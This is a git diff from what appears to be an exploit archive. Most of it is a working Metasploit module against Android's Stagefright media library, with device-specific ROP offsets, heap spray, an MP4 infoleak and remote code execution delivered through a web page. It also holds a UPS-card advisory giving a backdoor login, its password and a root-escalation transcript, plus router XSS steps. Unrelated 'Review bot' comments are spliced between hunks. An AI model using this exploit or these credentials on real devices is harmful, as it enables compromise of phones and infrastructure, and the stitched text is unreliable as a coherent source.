'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LMY48I)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY48I', + 'Release' => '5.1.1', + 'Rop' => 'lmy-2' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LYZ28J', + 'Release' => '5.1.1', + 'Rop' => 'shamu / LYZ28J' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LVY48E)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LVY48E', + 'Release' => '5.1.1', + 'Rop' => 'lmy-2' + } + ], + [ + 'Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)', + { + 'Model' => 'SM-G900V', + 'Build' => 'LRX21T', + 'Release' => '5.0', + 'Rop' => 'sm-g900v / OE1', + 'SprayAddress' => 0xaf008000, + 'SampleIteratorSize' => 0xa8, + 'VectorSize' => 0xec + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => "Aug 13 2015", + 'DefaultTarget' => 0)) + +=begin + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) +=end + end + + def exploit + @peers = {} + super + end + + def get_target(request) + agent = request.headers['User-Agent'] + self.targets.each do |t| + next if t.name == 'Automatic' + regexp = Regexp.escape("Linux; Android #{t['Release']}; #{t['Model']} Build/#{t['Build']}") + return t if (agent =~ /#{regexp}/) + end + return nil + end + + # + # Construct a page worth of data that we'll spray + # + # NOTE: The data within is target-specific + # + def build_spray(my_target, peer, spray_addr) + # Initialize the page to a reasonable state. + page = '' + page = rand_text(4096) + + # Load target-based exploit-specific variables + details = get_details(my_target) + return nil if details.nil? + + # Calculate the libstagefright.so base address + vector_rva = details['VectorRVA'] + vector_ptr = peer[:vector_vtable_addr] + libsf_base = (vector_ptr & 0xfffff000) - (vector_rva & 0xfffff000) + + # If we smash mDataSource, this ends up controlling the program counter!! 
+=begin + 0xb65fd7c4 : ldr r2, [r0, #0] + 0xb65fd7c6 : str r1, [sp, #0] + 0xb65fd7c8 : ldr r5, [r7, #0] + 0xb65fd7ca : str r5, [sp, #4] + 0xb65fd7cc : ldr r6, [r2, #28] + 0xb65fd7ce : ldrd r2, r3, [r10] + 0xb65fd7d2 : blx r6 + 0xb65fd7d4 : ldrd r2, r3, [sp, #64] ; 0x40 +=end + + # Initialize our pivot values and adjust them to libstagefright's base. + # First, load r0 (pointer to our buffer) into some register.. + mds_pivot1 = libsf_base + details['Pivot1'] + + # Next, load sp (and probably other stuff) from there + mds_pivot2 = libsf_base + details['Pivot2'] + + # Finally, skip over some stuff and kick of the ROP chain + mds_adjust = libsf_base + details['Adjust'] + + # The offset to the ROP change beginning + rop_start_off = 0x30 + + # Point sp to the remainder of the ROP chain + new_sp = spray_addr + rop_start_off + + # Sometimes the spray isn't aligned perfectly, this fixes that situation... + unalign_off = 0x998 + new_sp2 = new_sp + 0x1000 - unalign_off + + # This pointer should point to the beginning of the shellcode payload + payload_ptr = spray_addr + 0xa0 + + # Put the stack back! + stack_fix = "\x0a\xd0\xa0\xe1" # mov sp, r10 ; restore original sp + + # Depending on the pivot strategy in use, we have to set things up slightly + # differently... + # + # In each case, we use a two-stage pivot that reads the spray address from + # r0 (we smashed that, remember). + # + # The addroffs array is used to map values to the offsets where the pivots + # expect them to be. 
+ # + case details['PivotStrategy'] + when 'lrx' + addroffs = [ + [ 0x0, new_sp ], + [ 0x10, mds_pivot2 ], + [ 0x1c, mds_pivot1 ], + ] + + # Since we are only popping one item in pivot2, we reduce the rop_start_off + rop_start_off -= 4 + + # Adjust the payload pointer + payload_ptr -= 4 + + when 'lmy-1' + addroffs = [ + [ 0x8, new_sp ], + [ 0xc, mds_adjust ], + [ 0x10, mds_pivot2 ], + [ 0x1c, mds_pivot1 ] + ] + + when 'lmy-2' + ptr_to_mds_pivot2 = spray_addr + 0x10 - 0x18 # adjust for displacement + addroffs = [ + [ 0x0, ptr_to_mds_pivot2 ], + [ 0x8, new_sp ], + [ 0xc, mds_adjust ], + [ 0x10, mds_pivot2 ], + [ 0x1c, mds_pivot1 ] + ] + + stack_fix = "\x09\xd0\xa0\xe1" # mov sp, r9 ; restore original sp + + when 'lyz' + ptr_to_mds_pivot2 = spray_addr + 0x8 + addroffs = [ + [ 0x0, ptr_to_mds_pivot2 ], + [ 0x8, mds_pivot2 ], + [ 0x1c, mds_pivot1 ], + [ 0x24, new_sp ], + # lr is at 0x28! + [ 0x2c, mds_adjust ] + ] + + # We can't fix it becuse we don't know where the original stack is anymore :-/ + stack_fix = "" + + when 'sm-g900v' + addroffs = [ + [ 0x4, mds_adjust ], + [ 0x10, new_sp ], + [ 0x1c, mds_pivot1 ], + [ 0x20, mds_pivot2 ] + ] + + else + print_error("ERROR: PivotStrategy #{details['PivotStrategy']} is not implemented yet!") + return nil + end + + # We need our ROP to build the page... Create it. + rop = generate_rop_payload('stagefright', stack_fix + payload.encoded, {'base' => libsf_base, 'target' => my_target['Rop'] }) + + # Fix up the payload pointer in the ROP + idx = rop.index([ 0xc600613c ].pack('V')) + rop[idx, 4] = [ payload_ptr ].pack('V') + + # Insert the ROP + page[rop_start_off, rop.length] = rop + + # Insert the special values... + addroffs.each do |ao| + off,addr = ao + page[off,4] = [ addr ].pack('V') + + # Sometimes the spray isn't aligned perfectly... 
+ if addr == new_sp + page[off+unalign_off,4] = [ new_sp2 ].pack('V') + else + page[off+unalign_off,4] = [ addr ].pack('V') + end + end + + page + end + + # + # MPEG-4 specific functionality + # + def get_atom(tag, data='', length=nil) + if tag.length != 4 + raise 'Yo! They call it "FourCC" for a reason.' + end + + length ||= data.length + 8 + if length >= 2**32 + return [ [ 1 ].pack('N'), tag, [ length ].pack('Q>'), data ].join + end + [ [ length ].pack('N'), tag, data ].join + end + + def get_stsc(num) + stsc_data = [ 0, num ].pack('N*') # version/flags, mNumSampleToChunkOffsets + stsc_data << [ 13+1, 0x5a5a5a5a, 37 ].pack('N*') * num + get_atom('stsc', stsc_data) + end + + def get_ftyp + # Build the MP4 header... + ftyp = 'mp42' + ftyp << [ 0 ].pack('N') + ftyp << 'mp42' + ftyp << 'isom' + get_atom('ftyp', ftyp) + end + + def get_pssh(alloc_size) + pssh_data = '' + pssh_data << [ 0 ].pack('N') + pssh_data << [ 0, 0, 0, 0 ].pack('N*') + pssh_data << [ alloc_size ].pack('N') + alloc_size.times do |off| + pssh_data << [ 0x55aa0000 + off ] .pack('V') + end + get_atom('pssh', pssh_data) + end + + def get_metaitem(tag, type, data) + ret = '' + ret << tag.reverse + ret << type.reverse + case type + when 'in32' + ret << [ 4, data ].pack('V*') + when 'in64' + ret << [ 8, data ].pack('V*') + else + raise "How do you expect me to make a #{type.inspect} ??" + end + ret + end + + def jemalloc_round(sz) + # These are in the 16-byte aligned runs + if (sz > 0x10 && sz <= 0x80) + round = 16 + # 160 starts the 32-byte aligned runs + elsif (sz > 0x80 && sz <= 0x140) + round = 32 + else + raise "Don't know how to round 0x%x" % sz + end + ret = (sz + (round - 1)) / round + ret *= round + return ret + end + + # + # Leak data from mediaserver back to the browser! 
+ # + # Stage 1 - leak a heap pointer near a SampleIterator object + # Stage 2 - read a code pointer from the SampleIterator object + # + def get_mp4_leak(my_target, peer) + # MPEG4 Fileformat Reference: + # http://qtra.apple.com/index.html + # + # Structure: + # [File type Chunk][Other Atom Chunks] + # + # Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data] + # + sampiter_alloc_size = 0x78 + sampiter_alloc_size = my_target['SampleIteratorSize'] if not my_target['SampleIteratorSize'].nil? + sampiter_rounded = jemalloc_round(sampiter_alloc_size) + vector_alloc_size = 0x8c + vector_alloc_size = my_target['VectorSize'] if not my_target['VectorSize'].nil? + groom_count = 0x10 + + is_samsung = (my_target['Rop'] == 'sm-g900v / OE1') + + # Coerce the heap into a favorable shape (fill holes) + shape_vector = get_pssh(vector_alloc_size) + + # Allocate a block of memory of the correct size + placeholder = get_atom('titl', ('t' * 4) + ('titl' * (vector_alloc_size / 4)) + [ 0 ].pack('C')) + + # Make the first tx3g chunk, which is meant to overflow into a MetaData array. + # We account for the overhead of both chunks here and aim for this layout: + # + # placeholder after re-allocation | vector array data + # | + # + # Realistically, tx3g1_padding can be any number that rounds up to the + # correct size class. + tx3g1_overhead = 0x8 + tx3g2_overhead = 0x10 + tx3g_target = jemalloc_round(vector_alloc_size) + tx3g1_padding = tx3g_target - (tx3g1_overhead + tx3g2_overhead) + tx3g_data = 'x' * tx3g1_padding + tx3g_1 = get_atom('tx3g', tx3g_data) + + # NOTE: hvcC added in 3b5a6b9fa6c6825a1d0b441429e2bb365b259827 (5.0.0 and later only) + # avcC was in the initial commit. + near_sampiter = get_atom('hvcC', "C" * sampiter_alloc_size) + + # Craft the data that will overwrite the header and part of the MetaData + # array... 
+ more_data = '' + more_data << [ 9, vector_alloc_size - 0x10, 0, 0 ].pack('V*') + + # Now add the thing(s) we want to control (partially) + # + # We add some BS entries just to kill the real 'heig' and get proper + # ordering... + near_sampiter_addr = peer[:near_sampiter_addr] + if near_sampiter_addr.nil? + # Part 1. Leak the address of a chunk that should be adjacent to a + # SampleIterator object. + if is_samsung + # On Samsung: + # Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt + # After: dmcE, abc1, abc2, abc3, heig... + more_data << get_metaitem('dmcE', 'in32', 1) + more_data << get_metaitem('abc1', 'in32', 31335) + more_data << get_metaitem('abc2', 'in32', 31336) + end + + # On Nexus: + # Before: heig, hvcc, inpS, mime, text, widt + # After: abc3, heig... + more_data << get_metaitem('abc3', 'in32', 31337) + + # NOTE: We only use the first 12 bytes so that we don't overwrite the + # pointer that is already there! + heig = get_metaitem('heig', 'in32', 31338) + more_data << heig[0,12] + else + # Part 2. Read from the specified address, as with the original Metaphor + # exploit. + if is_samsung + # On Samsung: + # Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt + # After: dmcE, dura, ... + more_data << get_metaitem('dmcE', 'in32', 1) + else + # On Nexus: + # Before: avcc, heig, inpS, mime, text, widt + # After: dura, ... + near_sampiter = get_atom('avcC', "C" * sampiter_alloc_size) + end + + # Try to read the mCurrentChunkSampleSizes vtable ptr within a + # SampleIterator object. This only works because the Vector is empty thus + # passing the restrictions imposed by the duration conversion. + ptr_to_vector_vtable = near_sampiter_addr - (sampiter_rounded * 2) + 0x30 + more_data << get_metaitem('dura', 'in64', ptr_to_vector_vtable) + end + + # The tx3g2 then needs to trigger the integer overflow, but can contain any + # contents. The overflow will terminate at the end of the file. 
+ # + # NOTE: The second tx3g chunk's overhead ends up in the slack space between + # the replaced placeholder and the MetaData Vector contents. + big_num = 0x1ffffffff - tx3g_1.length + 1 + vector_alloc_size + tx3g_2 = get_atom('tx3g', more_data, big_num) + + # Create a minimal, verified 'trak' to satisfy mLastTrack being set + stbl_data = get_stsc(1) + stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets + stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes + stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount + stbl = get_atom('stbl', stbl_data) + verified_trak = get_atom('trak', stbl) + + # Start putting it all together into a track. + trak_data = '' + + if is_samsung + # Put some legitimate duration information so we know if we failed + mdhd_data = [ 0 ].pack('N') # version + mdhd_data << "\x00" * 8 # padding + mdhd_data << [ 1 ].pack('N') # timescale + mdhd_data << [ 314 ].pack('N') # duration + mdhd_data << [ 0 ].pack('n') # lang + trak_data << get_atom('mdhd', mdhd_data) + end + + # Add this so that our file is identified as video/mp4 + mp4v_data = '' + mp4v_data << [ 0 ].pack('C') * 24 # padding + mp4v_data << [ 1024 ].pack('n') # width + mp4v_data << [ 768 ].pack('n') # height + mp4v_data << [ 0 ].pack('C') * (78 - mp4v_data.length) # padding + trak_data << get_atom('mp4v', mp4v_data) # satisfy hasVideo = true + + # Here, we cause allocations such that we can replace the placeholder... + if is_samsung + trak_data << placeholder # Somethign we can free + trak_data << shape_vector # Eat the loose block... + trak_data << stbl # Cause the growth of the track->meta Vector + else + trak_data << stbl # Cause the growth of the track->meta Vector + trak_data << placeholder # Somethign we can free + trak_data << shape_vector # Eat the loose block... + end + + # Add the thing whose entry in the MetaData vector we want to overwrite... 
+ trak_data << near_sampiter + + # Get our overflow data into memory + trigger = '' + trigger << tx3g_1 + + # Free the place holder + trigger << get_atom('titl', ('t' * 4) + ('BBBB' * vector_alloc_size) + [ 0 ].pack('C')) + + # Overflow the temporary buffer into the following MetaData array + trigger << tx3g_2 + + # !!! NOTE !!! + # On Samsung devices, the failure that causes ERR to be returned from + # 'tx3g' processing leads to "skipTrack" being set. This means our + # nasty track and it's metadata get deleted and not returned to the + # browser -- effectively killing the infoleak. + # + # However! It also handles "skipTrack" being set specially and does not + # immediately propagate the error to the caller. Instead, it returns OK. + # This allows us to triggering the bug multiple times in one file, or -- + # as we have in this case -- survive after and return successfully. + if is_samsung + # Add this as a nested track! + trak_data << get_atom('trak', trigger) + else + trak_data << trigger + end + trak = get_atom('trak', trak_data) + + # On Samsung devices, we could put more chunks here but they will + # end up smashing the temporary buffer further... 
+ + chunks = [] + chunks << get_ftyp() + chunks << get_atom('moov') + chunks << verified_trak * 0x200 + chunks << shape_vector * groom_count + chunks << trak + + mp4 = chunks.join + mp4 + end + + def get_mp4_rce(my_target, peer) + # MPEG4 Fileformat Reference: + # http://qtra.apple.com/index.html + # + # Structure: + # [File type Chunk][Other Atom Chunks] + # + # Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data] + # + chunks = [] + chunks << get_ftyp() + + # Note, this causes a few allocations + moov_data = '' + mvhd_data = [ 0, 0x41414141 ].pack('N*') + mvhd_data << 'B' * 0x5c + moov_data << get_atom('mvhd', mvhd_data) + + # Add a minimal, verified 'trak' to satisfy mLastTrack being set + verified_trak = '' + stbl_data = get_stsc(0x28) + stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets + stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes + stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount + verified_trak << get_atom('trak', get_atom('stbl', stbl_data)) + + # Add it to the file + moov_data << verified_trak + + # The spray_addr field is typically determined empirically (by testing), but + # has proven to be fairly predictable (99%). However, it does vary from + # one device to the next (probably determined by the pre-loaded libraries). + spray_addr = 0xb0c08000 + spray_addr = my_target['SprayAddress'] if not my_target['SprayAddress'].nil? + + # Construct a single page that we will spray + page = build_spray(my_target, peer, spray_addr) + return nil if page.nil? 
+ + # Build a big block full of spray pages and and put it in an avcC chunk + # (but don't add it to the 'moov' yet) + spray = page * (((16 * 1024 * 1024) / page.length) - 20) + avcc = get_atom('avcC', spray) + + # Make the nasty trak + tkhd1 = '' + tkhd1 << [ 0 ].pack('C') # version + tkhd1 << 'D' * 3 # padding + tkhd1 << 'E' * (5*4) # {c,m}time, id, ??, duration + tkhd1 << 'F' * 0x10 # ?? + tkhd1 << [ + 0x10000, # a00 + 0, # a01 + 0, # dx + 0, # a10 + 0x10000, # a11 + 0 # dy + ].pack('N*') + tkhd1 << 'G' * 0x14 # ?? + + # Add the tkhd (track header) to the nasty track + trak1 = '' + trak1 << get_atom('tkhd', tkhd1) + + # Build and add the 'mdia' (Media information) to the nasty track + mdia1 = '' + mdhd1 = [ 0 ].pack('C') # version + mdhd1 << 'D' * 0x17 # padding + mdia1 << get_atom('mdhd', mdhd1) + mdia1 << get_atom('hdlr', 'F' * 0x38) # Media handler + dinf1 = '' + dinf1 << get_atom('dref', 'H' * 0x14) # Data information box + minf1 = '' + minf1 << get_atom('smhd', 'G' * 0x08) + minf1 << get_atom('dinf', dinf1) + stbl1 = get_stsc(2) + minf1 << get_atom('stbl', stbl1) + mdia1 << get_atom('minf', minf1) + trak1 << get_atom('mdia', mdia1) + + # Add something to take up a slot in the 0x20 size range + # NOTE: We have to be able to free this later... + block = 'Q' * 0x1c + trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block)) + + # Add a Track (hopefully right after) + trak1 << verified_trak + + # Add the avcC chunk with the heap spray. We add it here so it's sure to be + # allocated when we get control of the program counter... + trak1 << avcc + + # Build the first of the nasty pair of tx3g chunks that trigger the + # vulnerability + alloc_size = 0x20 + overflow_size = 0xc0 + + overflow = [ spray_addr ].pack('V') * (overflow_size / 4) + tx3g_1 = get_atom('tx3g', overflow) + trak1 << tx3g_1 + + # Free the original thing and put the tx3g temporary in it's place... 
+ block = 'R' * 0x40 + trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block)) + + # Make the second one, which triggers the integer overflow + big_num = 0x1ffffffff - 8 - overflow.length + 1 + alloc_size + more_data = [ spray_addr ].pack('V') * (overflow_size / 4) + tx3g_2 = get_atom('tx3g', more_data, big_num) + trak1 << tx3g_2 + + # Add the nasty track to the moov data + moov_data << get_atom('trak', trak1) + + # Finalize the moov chunk + moov = get_atom('moov', moov_data) + chunks << moov + + # Combine outer chunks together and voila. + mp4 = chunks.join + mp4 + end + + def on_request_uri(cli, request) + # If the request is for an mp4 file, we need to get the target from the @peers hash + if request.uri =~ /\.mp4\?/i + mp4_fn = request.uri.split('/')[-1] + mp4_fn = mp4_fn.split('?')[0] + mp4_fn[-4,4] = '' + + peer = @peers[mp4_fn] + + my_target = nil + my_target = peer[:target] if peer + if my_target.nil? + send_not_found(cli) + print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown peer") + return + end + + # Extract the address(s) we just leaked... + sia_addr = request.qstring['sia'].to_i # near_sampiter data address + peer[:near_sampiter_addr] = sia_addr if sia_addr > 0 + sfv_addr = request.qstring['sfv'].to_i # stagefright Vector vtable ptr + peer[:vector_vtable_addr] = sfv_addr if sfv_addr > 0 + # reset after a crash.. + if sia_addr == 0 && sfv_addr == 0 + peer[:near_sampiter_addr] = peer[:vector_vtable_addr] = nil + end + + # Always use this header + out_hdrs = {'Content-Type'=>'video/mp4'} + + if peer[:vector_vtable_addr].nil? + # Generate the nasty MP4 to leak infoz + mode = "infoleak" + mp4 = get_mp4_leak(my_target, peer) + else + mode = "RCE" + mp4 = get_mp4_rce(my_target, peer) + if mp4.nil? 
+ send_not_found(cli) + print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Failed to generate RCE MP4") + return + end + end + + # Send the nasty MP4 file to trigger the vulnerability + if request.headers['Accept-Encoding'] and request.headers['Accept-Encoding'].include? 'gzip' + mp4 = Rex::Text.gzip(mp4) + out_hdrs.merge!('Content-Encoding' => 'gzip') + gzip = "gzip'd" + else + gzip = "raw" + end + + client = "Browser" + if request.headers['User-Agent'].include? 'stagefright' + client = "SF" + end + + addrs = "heap: 0x%x, code: 0x%x" % [ peer[:near_sampiter_addr].to_i, peer[:vector_vtable_addr].to_i ] + + print_status("Sending #{mode} #{gzip} MPEG4 (#{mp4.length} bytes) to #{cli.peerhost}:#{cli.peerport}... (#{addrs} from #{client})") + + # Send the nastiness! + send_response(cli, mp4, out_hdrs) + return + end + + # Initialize a target. If none suitable, then we don't continue. + my_target = target + if my_target.name =~ /Automatic/ + my_target = get_target(request) + if my_target.nil? + send_not_found(cli) + print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown user-agent: #{request['User-Agent'].inspect}") + return + end + vprint_status("Target selected: #{my_target.name}") + end + + # Generate an MP4 filename for this peer + mp4_fn = rand_text_alpha(11) + + # Save the target for when they come back asking for this file + # Also initialize the leak address to the first one + @peers[mp4_fn] = { :target => my_target } + + # Send the index page + mp4_uri = "#{get_resource.chomp('/')}/#{mp4_fn}.mp4" + html = %Q^ + +Please wait... + + +
+Please wait while we locate your content... + + +^ + print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + + # + # Return some firmware-specific values to the caller. + # + # The VectorRVA field is extracted using the following command: + # + # $ arm-eabi-readelf -a libstagefright.so | grep _ZTVN7android6VectorIjEE + # + def get_details(my_target) + details = { + 'lrx' => { + 'VectorRVA' => 0x10ae30, + 'PivotStrategy' => 'lrx', + 'Pivot1' => 0x67f7b, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1 + 'Pivot2' => 0xaf9dd, # ldm.w r4, {sp} ; pop {r3, pc} + 'Adjust' => 0x475cd # pop {r3, r4, pc} + }, + 'lmy-1' => { + 'VectorRVA' => 0x10bd58, + 'PivotStrategy' => 'lmy-1', + 'Pivot1' => 0x68783, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1 + 'Pivot2' => 0x81959, # ldm.w r4, {r1, ip, sp, pc} + 'Adjust' => 0x479b1 # pop {r3, r4, pc} + }, + 'lmy-2' => { + 'VectorRVA' => 0x10bd58, + 'PivotStrategy' => 'lmy-2', + 'Pivot1' => 0x6f093, # ldr r0, [r0, #0x10] ; ldr r3, [r0] ; ldr r1, [r3, #0x18] ; blx r1 + 'Pivot2' => 0x81921, # ldm.w r0!, {r1, ip, sp, pc} + 'Adjust' => 0x479b1 # pop {r3, r4, pc} + }, + 'shamu / LYZ28E' => { + 'VectorRVA' => 0x116d58, + 'PivotStrategy' => 'lyz', + 'Pivot1' => 0x91e91, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3 + 'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc} + 'Adjust' => 0x44f81 # pop {r3, r4, pc} + }, + 'shamu / LYZ28J' => { + 'VectorRVA' => 0x116d58, + 'PivotStrategy' => 'lyz', + 'Pivot1' => 0x91e49, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3 + 'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc} + 'Adjust' => 0x44f81 # pop {r3, r4, pc} + }, + 'sm-g900v / OE1' => { + 'VectorRVA' => 0x174048, + 'PivotStrategy' => 'sm-g900v', + 'Pivot1' => 0x89f83, # ldr r4, [r0] ; ldr r5, [r4, #0x20] ; blx r5 + 'Pivot2' => 0xb813f, # ldm.w r4!, {r5, r7, r8, fp, sp, lr} ; cbz r0, #0xb8158 ; ldr r1, 
[r0] ; ldr r2, [r1, #4] ; blx r2 + 'Adjust' => 0x65421 # pop {r4, r5, pc} + } + } + + details[my_target['Rop']] + end + +end \ No newline at end of file diff --git a/platforms/hardware/remote/40431.txt b/platforms/hardware/remote/40431.txt new file mode 100755 index 000000000..bcbeb84a1 --- /dev/null +++ b/platforms/hardware/remote/40431.txt 
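Review bot: In `build_spray` of platforms/android/remote/40436.rb, the literal `0xc600613c` passed to `rop.index` is an unexplained magic value, and the index it returns is used unchecked, so a chain without that marker fails with a TypeError at `rop[idx, 4] = ...` instead of taking the `return nil` path the method already uses for an unknown `PivotStrategy`. Presumably the value is the payload-pointer placeholder in the 'stagefright' RopDb chain; a named constant with a one-line comment saying so, followed by `return nil if idx.nil?`, would document it and keep the error handling consistent. The same method assigns `page = ''` and overwrites it on the next line with `rand_text(4096)`, so the first assignment is dead. The `=begin ... register_options ... =end` block and the commented-out `'DefaultOptions'` entry in `initialize` are likewise dead code that should be removed or explained in a comment.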
@@ -0,0 +1,78 @@
+NetMan 204 - Backdoor Account
+
+Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
+
+Product: NetMan 204
+Vendor: http://www.riello-ups.com
+Product URL: http://www.riello-ups.com/products/4-software-connectivity/85-netman-204
+Quick Reference Installation Manual : http://www.riello-ups.com/uploads/file/325/1325/0MNACCSA4ENQB__MAN_ACC_NETMAN_204_QST_EN_.pdf
+
+Date: 23 Sep 2016
+
+About Product:
+----------------------
+The NetMan 204 network agent allows UPS directly connected over LAN 10/100 Mb connections to be managed using the main network communication protocols (TCP /IP , HTTP HTTPS, SSH, SNMPv1, SNMPv2 and SNMPv3).
+It is the ideal solution for the integration of UPS over Ethernet networks with Modbus/TCP and BACnet/IP protocols. It was developed to integrate UPS into medium-sized and large networks,
+to provide a high level of reliability in communication between the UPS and associated management systems.
+
+Vulnerability Report:
+----------------------
+The UPS Module has 3 default accounts, (admin,fwupgrade,user) , fwupgrade has a shell access to the device BUT if you try to get access to the shell a shell script closes your conection.
+to stop the shell script and avoid to terminate your connection you should , set your SSH client to execute "/bin/bash" after you logon the SSH. as a result your shell type will be changed to "/bin/bash"
+as you see below there is an account called "eurek" and ofcourse it's password also is "eurek".
+Since that "eurek" is a sudoer user you will get full access to the device.
+
+Enjoy It!
+
+
+login as: eurek
+eurek@172.19.16.33's password:
+Could not chdir to home directory /home/eurek: No such file or directory
+eurek@UPS:/$ id
+uid=1000(eurek) gid=1000(eurek) groups=1000(eurek),27(sudo)
+eurek@UPS:/$ sudo bash
+[sudo] password for eurek:
+root@UPS:/# id
+uid=0(root) gid=0(root) groups=0(root)
+root@UPS:/#
+
+
+
+login as: fwupgrade
+fwupgrade@172.19.16.33's password:
+fwupgrade@UPS:/home/fwupgrade$ cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
+messagebus:x:102:104::/var/run/dbus:/bin/false
+eurek:x:1000:1000:eurek,,,:/home/eurek:/bin/bash
+postfix:x:103:106::/var/spool/postfix:/bin/false
+statd:x:104:65534::/var/lib/nfs:/bin/false
+pulse:x:105:110:PulseAudio daemon,,,:/var/run/pulse:/bin/false
+rtkit:x:106:112:RealtimeKit,,,:/proc:/bin/false
+admin:x:1001:1001:,,,:/home/./admin:/bin/bash
+fwupgrade:x:1002:1002:,,,:/home/./fwupgrade:/bin/bash
+user:x:1003:1003:,,,:/home/user:/bin/bash
+ftp:x:107:113:ftp daemon,,,:/srv/ftp:/bin/false
+fwupgrade@UPS:/home/fwupgrade$
+
+
+
+# EOF
\ No newline at end of file
diff --git a/platforms/hardware/webapps/40432.txt b/platforms/hardware/webapps/40432.txt
new file mode 100755
index 000000000..fd8dff49f
--- /dev/null
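Review bot: The report never states which NetMan 204 firmware the `eurek` and `fwupgrade` findings were observed on, so a reader cannot tell whether a given card is affected or whether a later firmware removes the account; a `Tested firmware: <version, not stated in the report>` line under `Product:` would close that gap. It also ends without any remediation. Since the transcript shows `eurek` in group `27(sudo)` with a password equal to the username, a short closing section would make the advisory actionable for defenders: keep the card's SSH and web interfaces on an isolated management network, and ask the vendor for firmware in which the built-in accounts are removed or re-keyed.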
+++ b/platforms/hardware/webapps/40432.txt
@@ -0,0 +1,44 @@
+# Exploit Title: TP-Link Archer CR-700 XSS vulnerability
+# Google Dork: N/A
+# Date: 09/07/2016
+# Exploit Author: Ayushman Dutta
+# Vendor Homepage: http://www.tp-link.us/
+# Software Link: N/A
+# Version: 1.0.6 (REQUIRED)
+# Tested on: Linux
+# CVE : N/A
+#Exploit Information:
+https://github.com/ayushman4/TP-Link-Archer-CR-700-XSS-Exploit/blob/master/README.md
+
+TP-Link-Archer-CR-700-XSS-Exploit
+
+Exploiting TP-Link Archer CR-700 Router. (Responsibly Disclosed to TP-Link)
+
+Step 1-> On you linux machine (Kali or Ubuntu) type the following command
+
+gedit /etc/dhcp/dhclient.conf
+
+Comment out the line below
+send host-name = gethostname();
+
+Copy it to the line below it and change the gethostname() function to an XSS script like below.
+
+send host-name = "";
+
+Step 2:Restart your linux system so that the changes takes into effect.
+
+Step 3: Send a DHCP request to the router to receive an IP address with the command below.(Try this on any open network routers which is using TP-Link Archer CR-700)
+
+dhclient -v -i wlan0
+
+On running the command above, it send a DHCP request to the router. On a DHCP request, the host name is sent to which we have forcibly set it to an XSS script
+
+Step 4: Login to the administrator console.
+
+On logging in the Script executes.
+
+One more issue that I saw in the router that was that there was no CSRF token. The cookie set by the router contains a base64 encoded username & password whcih can be stolen using an XSS script.
+
+Note:All The above information has been disclosed to TP-Link, who have reporduced the problem and passed it to their R&D team to fix the issue.
+
+A URL to the product https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W
diff --git a/platforms/lin_x86/local/40435.rb b/platforms/lin_x86/local/40435.rb
new file mode 100755
index 000000000..888ab721f
--- /dev/null
+++ b/platforms/lin_x86/local/40435.rb
